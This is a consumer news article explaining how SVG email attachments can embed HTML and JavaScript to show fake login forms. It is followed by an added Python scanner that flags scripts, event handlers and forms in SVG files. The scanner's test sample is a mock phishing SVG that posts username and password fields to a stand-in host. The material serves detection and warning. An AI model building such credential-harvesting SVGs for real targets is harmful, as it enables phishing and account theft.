DayFR Euro

What is .SVG, a new attack vector for cybercriminals?

Cybercriminals never lack imagination when it comes to carrying out their misdeeds. The newest fashionable technique relies on SVG files, a format not necessarily well known to the general public.

You should always be wary of email attachments. Long used in large-scale hacking campaigns, these files can be much more malicious than they appear. And after relying on plain .PNG and .JPG images, the most fashion-conscious cybercriminals have now moved to .SVG, notes Bleeping Computer.

What is an SVG file?

Short for Scalable Vector Graphics, SVG files are, as their name suggests, vector images. That is, rather than encoding information pixel by pixel, they contain code “describing” the image. For example, to create a red line 100 px long, an SVG file will simply specify the thickness, length and color of the line, whereas a “classic” JPG file will have to indicate one by one the content of the 100 pixels that make up the line.

Very effective for generating “simple” shapes, such as graphics or logos, SVG files are especially appreciated for their ability to adapt to any screen resolution. Because displaying them means interpreting code rather than decoding an image with a fixed pixel count, SVG files can appear as large or as small as needed without losing quality.

Vector images can be enlarged infinitely // Source: tiger66 – Wikimedia Commons (CC BY-SA 2.5)

An SVG image designed to take up 30% of the available screen will be displayed in the same way, and without losing quality, on a phone screen or on a 55-inch .

Why is it dangerous?

But then why are SVG files now popular with cybercriminals of all kinds? Well, as Bleeping Computer notes, drawing on research carried out by the MalwareHunterTeam collective, SVG files allow HTML code to be embedded and JavaScript elements to be executed when opened.

If all that doesn't make things any clearer, it means that an .SVG image can almost pass for an interactive website. Thus, it becomes easy to create fake sites from scratch with fake login prompts to steal usernames or passwords.


Unfortunately, because the malicious code is often hidden behind what looks like the plain description of an image, many antivirus programs do not immediately detect the threat. To protect yourself, therefore, do not open attachments whose origin you do not know, and if you do not work with SVG files, ESPECIALLY do not open these attachments.
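For mail filtering or triage, the "active content" described above can be checked for directly, since an SVG is XML. The following is an added example, not code from the article or from Bleeping Computer; the list of flagged elements, the function names and both sample files (including the `collector.example` address) are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample attachments (not taken from any real campaign).
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="10">
  <line x1="0" y1="5" x2="100" y2="5" stroke="red" stroke-width="2"/>
</svg>"""

SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <foreignObject width="300" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://collector.example/submit">
      <input name="user"/><input name="pass" type="password"/>
    </form>
  </foreignObject>
  <a xlink:href="javascript:void(0)"><text y="20">Open</text></a>
  <script>function init() {}</script>
</svg>"""

ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "form"}
URL_ATTRS = {"href", "src", "action"}


def local(name):
    """Strip the '{namespace}' prefix ElementTree adds to tag/attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(text):
    """Return a sorted list of reasons an SVG should not be treated as a plain image."""
    if re.search(r"<!(DOCTYPE|ENTITY)", text, re.I):
        return ["doctype-or-entity"]  # refuse to parse: avoids entity-expansion tricks
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return ["unparseable"]
    findings = set()
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.add("element:" + tag)  # embedded HTML or script container
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):
                findings.add("handler:" + name)  # e.g. onload, onclick
            scheme = re.sub(r"\s+", "", value).lower()
            if name in URL_ATTRS and scheme.startswith(("javascript:", "data:")):
                findings.add("scripted-url:" + name)
    return sorted(findings)
```

An empty result means the file contains only drawing instructions; any finding is a reason to quarantine the attachment or render it to a bitmap before a user sees it.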

